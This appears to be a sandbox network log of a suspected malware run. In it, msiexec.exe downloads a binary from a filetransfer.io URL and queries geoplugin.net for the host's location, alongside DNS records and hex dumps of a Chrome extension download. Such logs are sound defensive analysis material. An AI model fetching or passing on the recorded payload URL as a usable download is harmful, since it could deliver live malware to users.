                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763845921 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.764070034 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.764158010 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.764180899 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808159113 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808279991 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808417082 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808424950 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808515072 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808588982 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808604956 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808634043 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808685064 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808851004 CET53091443192.168.11.20172.64.41.3
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.230691910 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.947175980 CET51245443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.995222092 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.995261908 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.995261908 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.067262888 CET44351245172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.067397118 CET44351245172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.067549944 CET44351245172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.068023920 CET51245443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.204950094 CET51245443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.756357908 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.756357908 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.756402016 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:13:53.789635897 CET138138192.168.11.20192.168.11.255
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 11, 2024 08:10:49.227427006 CET | 192.168.11.20 | 1.1.1.1 | 0x8085 | Standard query (0) | filetransfer.io | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:10:50.435508013 CET | 192.168.11.20 | 1.1.1.1 | 0x76cb | Standard query (0) | s20.filetransfer.io | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:10:56.177259922 CET | 192.168.11.20 | 1.1.1.1 | 0xc557 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:04.074681997 CET | 192.168.11.20 | 1.1.1.1 | 0x507c | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:04.074762106 CET | 192.168.11.20 | 1.1.1.1 | 0x973d | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Nov 11, 2024 08:11:12.424408913 CET | 192.168.11.20 | 1.1.1.1 | 0xa88d | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:14.068315029 CET | 192.168.11.20 | 1.1.1.1 | 0x542c | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:14.076397896 CET | 192.168.11.20 | 1.1.1.1 | 0x3d70 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:14.203205109 CET | 192.168.11.20 | 1.1.1.1 | 0xf4e2 | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:14.203520060 CET | 192.168.11.20 | 1.1.1.1 | 0xa0e4 | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:16.373864889 CET | 192.168.11.20 | 1.1.1.1 | 0x8646 | Standard query (0) | deff.nelreports.net | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:17.167675018 CET | 192.168.11.20 | 1.1.1.1 | 0xd3fe | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:17.167675018 CET | 192.168.11.20 | 1.1.1.1 | 0x6798 | Standard query (0) | dns.quad9.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 11, 2024 08:10:49.347805977 CET | 1.1.1.1 | 192.168.11.20 | 0x8085 | No error (0) | filetransfer.io | | 104.21.13.139 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:10:49.347805977 CET | 1.1.1.1 | 192.168.11.20 | 0x8085 | No error (0) | filetransfer.io | | 172.67.200.96 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:10:50.556304932 CET | 1.1.1.1 | 192.168.11.20 | 0x76cb | No error (0) | s20.filetransfer.io | | 172.67.200.96 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:10:50.556304932 CET | 1.1.1.1 | 192.168.11.20 | 0x76cb | No error (0) | s20.filetransfer.io | | 104.21.13.139 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:10:56.299335957 CET | 1.1.1.1 | 192.168.11.20 | 0xc557 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:04.192795038 CET | 1.1.1.1 | 192.168.11.20 | 0x507c | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 08:11:04.192795038 CET | 1.1.1.1 | 192.168.11.20 | 0x507c | No error (0) | googlehosted.l.googleusercontent.com | | 172.217.215.132 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:04.193665981 CET | 1.1.1.1 | 192.168.11.20 | 0x973d | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 08:11:12.541825056 CET | 1.1.1.1 | 192.168.11.20 | 0xd2b2 | No error (0) | svc.ha-teams.office.com | svc.ms-acdc-teams.office.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 08:11:12.541825056 CET | 1.1.1.1 | 192.168.11.20 | 0xd2b2 | No error (0) | svc.ms-acdc-teams.office.com | | 52.123.251.14 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:12.541825056 CET | 1.1.1.1 | 192.168.11.20 | 0xd2b2 | No error (0) | svc.ms-acdc-teams.office.com | | 52.123.247.94 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:12.541825056 CET | 1.1.1.1 | 192.168.11.20 | 0xd2b2 | No error (0) | svc.ms-acdc-teams.office.com | | 52.123.251.30 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:12.541825056 CET | 1.1.1.1 | 192.168.11.20 | 0xd2b2 | No error (0) | svc.ms-acdc-teams.office.com | | 52.123.251.5 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:12.542495966 CET | 1.1.1.1 | 192.168.11.20 | 0xa88d | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 08:11:14.198864937 CET | 1.1.1.1 | 192.168.11.20 | 0x542c | No error (0) | sb.scorecardresearch.com | | 3.163.101.92 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:14.198864937 CET | 1.1.1.1 | 192.168.11.20 | 0x542c | No error (0) | sb.scorecardresearch.com | | 3.163.101.24 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:14.198864937 CET | 1.1.1.1 | 192.168.11.20 | 0x542c | No error (0) | sb.scorecardresearch.com | | 3.163.101.125 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:14.198864937 CET | 1.1.1.1 | 192.168.11.20 | 0x542c | No error (0) | sb.scorecardresearch.com | | 3.163.101.8 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:14.198895931 CET | 1.1.1.1 | 192.168.11.20 | 0x3d70 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 08:11:14.333750010 CET | 1.1.1.1 | 192.168.11.20 | 0xf4e2 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 08:11:14.333769083 CET | 1.1.1.1 | 192.168.11.20 | 0xa0e4 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 08:11:16.492925882 CET | 1.1.1.1 | 192.168.11.20 | 0x8646 | No error (0) | deff.nelreports.net | deff.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 08:11:17.285895109 CET | 1.1.1.1 | 192.168.11.20 | 0xd3fe | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:17.285895109 CET | 1.1.1.1 | 192.168.11.20 | 0xd3fe | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:17.286003113 CET | 1.1.1.1 | 192.168.11.20 | 0x6798 | No error (0) | dns.quad9.net | | 149.112.112.112 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 08:11:17.286003113 CET | 1.1.1.1 | 192.168.11.20 | 0x6798 | No error (0) | dns.quad9.net | | 9.9.9.9 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49773 | 178.237.33.50 | 80 | 5024 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 08:10:56.510555983 CET | 71 | OUT | GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Nov 11, 2024 08:10:56.725507975 CET | 1170 | IN | HTTP/1.1 200 OK
    date: Mon, 11 Nov 2024 07:10:56 GMT
    server: Apache
    content-length: 962
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
    Data Ascii: { "geoplugin_request":"89.187.171.137", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Atlanta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"33.7485", "geoplugin_longitude":"-84.3871", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49767 | 104.21.13.139 | 443 | 5024 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 07:10:49 UTC | 190 | OUT | GET /data-package/kpFdlS7h/download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: filetransfer.io
    Cache-Control: no-cache
2024-11-11 07:10:50 UTC | 1241 | IN | HTTP/1.1 302 Found
    Date: Mon, 11 Nov 2024 07:10:50 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: Nette Framework 3
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
    Set-Cookie: PHPSESSID=cavpeluj70i7r0fo9pbtami48v; expires=Mon, 25-Nov-2024 07:10:50 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Vary: X-Requested-With
    Location: https://s20.filetransfer.io/storage/download/DSOnK3w83O1d
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9FPsQK56CH7ltbNhtF1iSX2N355skJnFDlgeqmzC6UPS1YBp9AhzzEKJF9vT%2F09nZjCu7HIvojhkZ6i%2FwyqleF8csiTg6D%2FbAb6JoDU2UEvevawT4xSvAyHvvxgln930v4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e0c76f9698dd1b7-ATL
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=117425&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=828&delivery_rate=32586&cwnd=252&unsent_bytes=0&cid=b95128da10473f5b&ts=797&x=0"
                                                                                                                                                                                                        2024-11-11 07:10:50 UTC128INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 30 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 44 53 4f 6e 4b 33 77 38 33 4f 31 64 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e
                                                                                                                                                                                                        Data Ascii: 80<h1>Redirect</h1><p><a href="https://s20.filetransfer.io/storage/download/DSOnK3w83O1d">Please click here to continue</a>.
                                                                                                                                                                                                        2024-11-11 07:10:50 UTC6INData Raw: 3c 2f 70 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: </p>
                                                                                                                                                                                                        2024-11-11 07:10:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


Session ID: 1
Source IP: 192.168.11.20
Source Port: 49768
Destination IP: 172.67.200.96
Destination Port: 443
PID: 5024
Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2024-11-11 07:10:50 UTC   Bytes transferred: 281   Direction: OUT
GET /storage/download/DSOnK3w83O1d HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: s20.filetransfer.io
Connection: Keep-Alive
Cookie: nette-samesite=1; PHPSESSID=cavpeluj70i7r0fo9pbtami48v

Timestamp: 2024-11-11 07:10:52 UTC   Bytes transferred: 1240   Direction: IN
HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 07:10:52 GMT
Content-Type: application/octet-stream
Content-Length: 493120
Connection: close
Last-Modified: Mon, 11 Nov 2024 02:26:23 GMT
Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
Set-Cookie: PHPSESSID=8153453912c49d074cbf137b7b8914b9; expires=Mon, 25-Nov-2024 07:10:51 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Disposition: attachment; filename="bEeIJA61.bin"
Accept-Ranges: bytes
Accept-Ranges: bytes
ETag: "67316b4f-78640"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqRbivRMJfrOAp1tapJCCxtfSoWSrTsDZyqW1zP3QVcuP9WU0pH5Ij0AbfLi97BDDqTYRMnpnJIHaDSZUxgX040ySRMisBKqknh2EDEMrLSkcL5UPKwxe9xtczH6n591uVjyZ%2Fr%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0c7700dae2678a-ATL
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=117509&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=895&delivery_rate=32574&cwnd=252&unsent_bytes=0&cid=029e98403a7986df&ts=1592&x=0"


Session ID: 2
Source IP: 192.168.11.20
Source Port: 49781
Destination IP: 172.217.215.132
Destination Port: 443
PID: 5764
Process: C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp: 2024-11-11 07:11:04 UTC   Bytes transferred: 570   Direction: OUT
GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9

Timestamp: 2024-11-11 07:11:04 UTC   Bytes transferred: 573   Direction: IN
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 135771
X-GUploader-UploadID: AHmUCY3sL20lYQ-SFQu8BXDKIJekTpQ_uYwJxgOxe2Y2S0n3tpNxQgWBwKg9buuRnRQtjmCnn3ESUY0HdQ
X-Goog-Hash: crc32c=5YFIVw==
Server: UploadServer
Date: Mon, 11 Nov 2024 03:40:16 GMT
Expires: Tue, 11 Nov 2025 03:40:16 GMT
Cache-Control: public, max-age=31536000
Age: 12648
Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT
ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC682INData Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                        Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC | 1255 | IN | Data Raw: 3c 04 c7 2e 17 9c 82 72 2d eb 27 90 de 78 70 f5 48 1e c4 51 f0 2e a9 38 02 21 00 d7 52 5e e9 bc c9 c7 25 83 97 57 30 dd 0e 9e b8 71 9c c0 fa 93 67 2e 44 b2 eb ac 92 7e ec 9e ae 22 f0 25 1f 8b 08 00 00 00 00 00 00 ff 95 9a 6d 6f b3 3a b6 86 ff ca e8 f9 3c 23 61 08 dd 65 be 95 04 43 68 70 8a f1 0b 78 34 7a 04 98 94 80 21 b4 21 0d 61 b4 ff fb 71 67 6f 1d 8d b4 f7 70 38 aa 54 89 36 c1 f8 f2 5a f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48
                                                                                                                                                                                                        Data Ascii: <.r-'xpHQ.8!R^%W0qg.D~"%mo:<#aeChpx4z!!aqgop8T6Z?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjH
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC | 1255 | IN | Data Raw: 75 58 ab 3f 31 af eb a4 bb 9a 49 02 b6 d1 0e 87 31 05 a0 6a 9d 18 f9 f6 0d 71 db a4 bc 34 f4 da 9f 72 cb f5 a5 72 0c 31 d7 7b 09 06 4a 16 eb 2e 9b d3 39 9e 8e 2b e3 00 b5 ec 22 8c e7 b9 0c 86 29 21 f8 84 88 3c a1 56 bd 09 6b b8 a6 a0 4e 90 8a 41 64 b1 47 69 d5 49 d5 0f af 45 07 78 62 5c ac 65 0d 64 c6 ca 18 e8 48 fa 6e e1 46 9e 84 51 7b d5 ae bd 6b ce a7 bc c1 1e 4d 71 96 1a c3 cc a1 dc 72 df ce 4b d3 de 4a 93 0d cc 47 57 e4 97 cb 79 98 ae ac fd bd bb e5 7d 39 51 00 3f 24 07 b7 24 70 af 28 01 3e db 51 ab 60 03 2d 66 84 49 2f 37 9c 45 76 61 d4 3e d9 c1 4b e5 0d 1b ee 2f ae 7f 97 ad 65 4f 60 5f 28 77 c7 77 f2 c1 69 18 6b ee 09 67 78 10 ac b6 65 62 58 91 8f 0e 89 2f ba 28 15 17 d4 23 4a a9 71 2f bc 81 2c d7 7e 31 ac f5 bc b1 31 5a 88 1b 77 cc 06 18 f9 d1 78
                                                                                                                                                                                                        Data Ascii: uX?1I1jq4rr1{J.9+")!<VkNAdGiIExb\edHnFQ{kMqrKJGWy}9Q?$$p(>Q`-fI/7Eva>K/eO`_(wwikgxebX/(#Jq/,~11Zwx
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC | 1255 | IN | Data Raw: 2d 03 61 ea b5 10 71 6b 07 a5 85 2f 72 d1 e7 4c e6 4a f6 3d 51 43 1c 13 65 e9 1e 86 08 e0 3c 2a cf 66 c8 cb ee 47 e8 46 79 2f 9f b0 42 4f 88 84 a7 8c c4 66 d4 8e bb cc b4 f9 d1 5f ee 33 0b 7e 5f c9 7e dc 1f 7d 7b 27 bc 9a 56 cc fd 2a e8 c8 f2 39 d6 3e 5a 46 95 57 77 05 55 5f 89 c7 36 94 3b 21 f1 50 94 b5 30 e7 9e 7d 2f a8 b1 c4 7e 5c 1d f7 3a a7 12 c8 ba ac 05 37 b6 05 1f d8 14 24 9a c5 57 69 ed ef 68 96 54 34 da 77 e8 95 d6 da fb ca db b1 8d 48 0d 4b 0e eb e5 7d 16 b0 d6 e7 bc 7e ef db 94 5d f8 89 3a 89 09 7f 36 50 83 a6 a8 ad 39 69 dc 83 ae af db 9c c0 36 a1 e3 a5 22 ed 3d 33 b3 b1 54 7b b3 dc c9 c5 1e a3 58 5d 6b c1 13 f1 d8 a7 76 b8 27 d4 28 3b 87 21 3f a6 83 75 f4 f7 33 6e d8 99 51 43 7b 5e 15 10 1a ce 44 c5 8f c2 57 47 c4 75 7d f6 16 f5 7e 5c eb 73
                                                                                                                                                                                                        Data Ascii: -aqk/rLJ=QCe<*fGFy/BOf_3~_~}{'V*9>ZFWwU_6;!P0}/~\:7$WihT4wHK}~]:6P9i6"=3T{X]kv'(;!?u3nQC{^DWGu}~\s
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC | 1255 | IN | Data Raw: 58 7b 86 83 51 c6 93 36 cc ca 00 06 b1 e5 ba cc c3 82 b6 13 a1 4a e7 b7 e5 ce d2 13 2d 21 ee 5b de b8 47 ed 05 79 d6 88 0d b5 a0 55 2c ea fd da 77 09 fb 8d 08 20 47 3e 4e 89 39 3e c5 0a 3e f1 d4 8d 51 57 47 95 f6 20 3a c7 5b ae f6 20 9d 95 11 41 a7 49 a0 6b 22 7f 4a 85 a5 16 e3 be ea ea 53 6c ac 7d a7 ea bc 52 0f e6 25 b5 4d a4 b2 0d 9e df 37 14 c0 cf 8c aa 5d 6e d8 54 98 28 d1 75 86 0b 05 0f 47 4f 24 4c 0d bd ec f1 97 5c de cf 7f ca a1 b3 4f d6 6a 0f 73 13 2d 3c 46 ac a2 a9 6a c2 20 82 d1 98 53 1c 4b a0 bd 88 e1 7c 94 16 4b a8 f1 7c a7 bb 68 2a 48 48 e9 2c 3e b2 74 b8 2f eb fe 70 49 01 4e d7 7a 9e b2 bb cc b2 1b 0f 88 4b 83 59 3a bf 5a e7 2d 33 b5 de ed 5c 4a 09 23 28 65 8f dc 9c b2 08 b8 31 63 6c 42 0f 30 1d 21 13 8b eb d0 af 3d 4b 23 f7 79 17 4f 24 1d
                                                                                                                                                                                                        Data Ascii: X{Q6J-![GyU,w G>N9>>QWG :[ AIk"JSl}R%M7]nT(uGO$L\Ojs-<Fj SK|K|h*HH,>t/pINzKY:Z-3\J#(e1clB0!=K#yO$
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC | 1255 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 b5 56 cb 6e db 30 10 bc f7 2b 04 9d 85 80 22 a9 57 7e a0 3f d1 0b 6d 51 a9 01 59 12 6c 07 2d 10 e4 df 1b 71 97 e0 d0 94 5b 3b 45 2e 04 ac 25 67 67 77 87 63 be e5 fb 93 35 17 3b d9 5f f9 f3 5b 7e b4 e7 b3 79 b1 f9 73 fe e3 55 74 b2 75 eb b0 ae ca 66 ee c7 3e 04 94 5d 57 e1 c2 42 e6 ef 45 6e 7f 2f a3 99 cc e5 30 4f f3 30 8c 87 c9 f6 87 b3 d9 8d b6 4f c1 45 ed 90 8c 83 2d cb 75 ad 1c a0 92 00 de 50 3a b7 49 75 eb aa 5b ca f7 94 85 0d c2 1d 29 89 a8 08 0c 75 43 df 29 47 95 04 dc 17 dd bb 63 35 64 e2 40 03 25 ab 01 0b cf be cf f3 cb c8 2d 71 27 55 1b b0 a4 0e 15 a8 2a e4 ab 76 80 ce 0d 15 1d b5 21 74 5a ef dc a6 06 f7 46 35 a5 14 b9 65 34 89 a1 20 e0 8a 60 42 5c 0b ac 87 d8 89 47 bb a8 52 12 b7 5a ea 4f 74 a1 aa a8 04 2a fa
                                                                                                                                                                                                        Data Ascii: Vn0+"W~?mQYl-q[;E.%ggwc5;_[~ysUtuf>]WBEn/0O0OE-uP:Iu[)uC)Gc5d@%-q'U*v!tZF5e4 `B\GRZOt*
